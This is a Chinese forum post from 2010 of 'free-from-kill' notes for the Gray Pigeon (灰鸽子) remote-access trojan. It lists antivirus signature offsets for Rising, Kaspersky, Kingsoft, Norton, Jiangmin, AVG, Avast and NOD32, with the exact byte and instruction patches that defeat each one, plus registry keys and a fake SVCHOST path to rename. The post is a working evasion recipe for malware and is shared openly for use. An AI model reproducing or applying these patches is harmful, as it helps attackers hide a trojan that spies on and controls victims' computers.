|
|
发表于 2010-1-18 01:10:25
|显示全部楼层
管理我也不容易啊````给我点亮吧````设置下权限````
黑防灰鸽子11月17日免杀手记
作者:书记
SOFTWARE\Microsoft\Windows\CurrentVersion\ddos
将他修改就行了
SOFTWARE\Microsoft\Windows\Windows
\WiNdOWs\sYstEm32\SVCHOST.exe
瑞星特征码
特征码 物理地址/物理长度 如下:
[特征] 00000A78_00000002 00401678 FD-FE 跳0046880E
[特征] 00001132_00000002 00401D32 OR-XOR (换位)
[特征] 000317F5_00000002+004323F4 CALL 00431EE4互换CALL 00432828
[特征] 0005FC91_00000002 上一步TEST-OR
[特征] 0005FCA9_00000002 向上2步xor改成or 向上两步换位
[特征] 0005FCB5_00000002+004608B5 TEST ESI, ESI 改为 OR ESI, ESI
[特征] 0005FDFB_00000002+004609FB 二进制BF-BE
[特征] 0005CAA9_00000002 0045D6A9 换位
[特征] 0008B425_00000002 50 改为 58
[特征] 00091C26_00000002+00492826 ADD-SUB
[特征] 000933FE_00000002 00493FFE 换位
[特征] 00094B3D_00000002+0049573E 管视频 跳004082CD
[特征] 00096232_00000002 5B-53
[特征] 00099481_00000002 上一步TEST-OR
[特征] 0009A534_00000002 上一步TEST-OR
[特征] 0009A5E2_00000002 上一步TEST-OR
[特征] 0009A67A_00000002 上一步TEST-OR
[特征] 0009A86C_00000002 上一步TEST-OR
[特征] 0009A87A_00000002 push 0 改为push 6
[特征] 0009A8D6_00000002 上一步TEST-OR
[特征] 0009AB3C_00000002 上一步TEST-OR
[特征] 0009AB64_00000002 上一步TEST-OR
[特征] 0009ABA2_00000002 上一步TEST-OR
[特征] 0009AD0C_00000002 上一步TEST-OR
[特征] 0009B58A_00000002 上一步TEST-OR
[特征] 0009B76A_00000002=0049C36A视频语音 换位
[特征] 0009B914_00000002 上一步TEST-OR
[特征] 0009B964_00000002 上一步TEST-OR
[特征] 0009BBB7_00000002 r-R
[特征] 0009BC1D_00000002 上一步TEST-OR
[特征] 0009C740_00000002 0049D340 换位
[特征] 0009CB76_00000002 0049D776 JA-JB
[特征] 0009CBAC_00000002 0049D7AC push 0-push 1
[特征] 0009CBBC_00000002 TEST-OR
[特征] 0009DC3E_00000002 07-06
-[特征] 0009EC43_00000002 xor-or 换位
[特征] 0009F3F6_00000002+0049FFF5 系统信息 跳004774A9
[特征] 0009F5A7_00000002 上一步TEST-OR
[特征] 000A0A46_00000002+004A1645语音 跳004A21E8
[特征] 000A0B4E_00000002 exist大小写
[特征] 000A0DB8_00000002 上一步TEST-OR
[特征] 000A0DD1_00000002=004A19D1上边push 0-push 1
[特征] 000A12A1_00000002 上一步test改or
[特征] 000A12A7_00000002 上一步test改or
[特征] 000A12E1_00000002 上一步test改or +004A1EE2 跳00477429
[特征] 000A14C3_00000002 PUSH 4A21BC换PUSH 4A21C4
[特征] 000B960A_00000002=004C0A0A 二进制5B-5E
[特征] 000B99B6_00000002 修改大小写
[特征] 0009F767_00000002 004A0367 50-51
[特征] 0009ABB8_00000002 上两步TEST-AND
[特征] 0005CDE0_00000002 换位
[特征] 0009B55C_00000002 0049C15C PUSH -POP
[特征] 000A3AC0_00000002 ADD-SUB 配置信息
[特征] 000980C4_00000002 AND
[特征] 000A12FA_00000002 AND
[特征] 0007FA78_00000002 00480678 换位
自动上线/共享/未知/注册
瑞星内存:
[特征] 00012B3F ADD-SUB
[特征] 00068BEE t-T
[特征] 0009ADF7 09-08
[特征] 000A158C So-sO
[特征] 000A15BE 字符替换
[特征] 000A15E0 字符替换
[特征] 000A6EFB+004AACFB对000A4BA0 EE-ED
[特征] 000A6F2B+004AAD2B对000A4BAC 1E-1D向后移位吧.
[特征] 000A695F+004AA75F对000A4A60 54-53
[特征] 0009B870-小变大写WINDOWS
[特征] 0009ADEC-0049B9EC 0009ADF0 00改2A
[特征] 0006D2D0-大变小写 P
[特征] 000A5350-004A9150 WriteFile移位
主动
没有发现共享信息!
沒有發現供亨消息!
正在错误管理器中检测错误
現在錯誤管理器中檢測錯誤
未知错误代号
陌生錯誤代號
正在查找错误信息
还在寻找錯誤消息
\Device\PhysicalMemory 内核数据
SOFTWARE\Borland\Delphi\RTL
capCreateCaptureWindowA CreateServiceA
ZwUnmapViewOfSection
-------------------------------------------------------------------
瑞星09
特征码 物理地址/物理长度 如下:
[特征] 0000792D_00000002 大小写
[特征] 000079E5_00000002 大小写
[特征] 00012D58_00000002 00413958 反向[特征] 00004D4B_00000002 TEST-OR
[特征] 0001C10D_00000002 EB-EC
[特征] 0007D002_00000002 换位
[特征] 0007DA03_00000002 ADD-SUB
[特征] 0009A87A_00000002 换位
[特征] 000A0DD1_00000002 FF-FE
[特征] 000A1401_00000002 58-59
[特征] 000B1803_00000002 XOR-OR 会导致不能加壳 反向[特征] 000AC46F_00000002 004B2C6F
[特征] 00002D0D_00000002 换位
[特征] 0009EAF8_00000002 AND
[特征] 000875B6_00000002 004881B6 跳0045A5CF
004881B2 890C86 MOV DWORD PTR DS:[ESI+EAX*4],ECX
004881B5 8B73 10 MOV ESI,DWORD PTR DS:[EBX+10]
004881B8 69CA E6A7FFFF IMUL ECX,EDX,FFFFA7E6
主动:
特征码 物理地址/物理长度 如下:
[特征] 00062027_00000002 填零
[特征] 000A7453_00000002 反向[特征] 00002EB3_00000002 右\改左/
[特征] 000A3AC0_00000002
-------------------------------------------------------------------
卡巴特征
特征码 物理地址/物理长度 如下:
[特征] 000A0931_00000002+004A1531 跳004A21F6
[特征] 000A09FF_00000002+004A15FF 跳0049C49A
[特征] 000A0B26_00000002 前边改大小写
[特征] 000A0E48_00000002 004A1A0E 5D改55
[特征] 000A1366_00000002 ADD-SUB
[特征] 000B9A2C_00000002+004C0E2C 大小写:gRAYpIGEON 上边改H
高启发
[特征] 000974C1_00000002 大小写
[特征] 00097505_00000004 大小写
[特征] 000A15B8_00000002 大小写
配置信息
[特征] 00059E78_00000002 0045AA78 CALL 0045B5C5
[特征] 00059EFC_00000002 0045AAFC CALL 00482B79
[特征] 000004BB_00000002
-------------------------------------------------------------------
金山:
[特征] 000A1257_00000002-004A1E57 上两步跳到004A2175.下边组拉长
[特征] 000A3394_00000002 004A4D94 换位 远程光标传送失效(因为不杀不动)
[特征] 0005FC81_00000002 主机查找已取消 改为 主鸡寻找已放弃
[特征] 000A1356_00000002 004A1F56 跳0049BB47 00477757 上传文件失效
[特征] 000A1356_00000002
[特征] 000A1356_00000002 CALL 0009B4C0换CALL 0000890C
[特征] 000A1356_00000002 反向[特征] 00020458_00000002 00421058 CALL地址加1
金山内存
特征码 物理地址/物理长度 如下:
[特征] 0005FCA3_00000001 004608A3
[特征] 0005FDEB_00000001 004609EB 无效的缓冲区-没有效果缓充 空的远程地址-无的远方地址 正在传送数据 現在傳送數據
[特征] 000735E7_00000002 大小写
一处修改,两行代码换位.
0046089E |. 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
004608A1 |. 8955 FC MOV DWORD PTR SS:[EBP-4],EDX
诺盾:
特征码 物理地址/物理长度 如下:
[特征] 00069416_00000002 46-45
[特征] 0009FF32_00000002 85-86
江民:
特征码 物理地址/物理长度 如下:
[特征] 0009F6C6_00000002 TEST-or
[特征] 000A12E6_00000002 004A1EE6 换位
[特征] 000A1322_00000002+004A1F22 跳:0049BB3D
[特征] 0009F46B_00000002 系統心片=系統核心
[特征] 0009F661_00000002 剪切板内容为空或非文本信息=剪切板內容為空或非文字信息
[特征] 000A12E7_00000002 004A1EE7 跳0049BB47
[特征] 000A1488_00000002 JE=JNZ
[特征] 000A0F76_00000002
江民输入表:
[特征] 000A71AE_00000002
[特征] 000A71BA_00000002
[特征] 000A71CC_00000002
反向
[特征] 000A4FC6_00000002
[特征] 000A4FF0_00000002
AVG:
特征码 物理地址/物理长度 如下:
[特征] 0007CD48_00000002 0047D948 call地址改为0047332A
[特征] 00096F4A_00000002 00497B4A JNZ修改为JZ
[特征] 0009748C_00000002 0049808C 0009747B处00改01
[特征] 0009B674_00000002 0049C274 5A改为5C
[特征] 0009B9C2_00000002 0049C5C2 特征码上方JNZ改为JZ
[特征] 0009B672_00000002 jnz-jz
[特征] 0009B678_00000002 0049C278 上下换位
AVAST特征
特征码 物理地址/物理长度 如下:
[特征] 0000B398_00000002 上下互换
[特征] 0005CFFB_00000003 前边大小写修改
[特征] 000725AF_00000002 TEST=OR
[特征] 00097532_00000002 前边字母前后替换
[特征] 000A0B0E_00000002 大小写
[特征] 000A7621_00000002 前边大小写
NOD:
[特征] 0009E535_00000002 0049F135
[特征] 0009E7B9_00000002 0049F3B9
[特征] 0009EBBA_00000002 0049F7BA
[特征] 0000031D_00000002 PE头多一处
希望给更多爱好免杀的朋友有所帮助. |
|
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡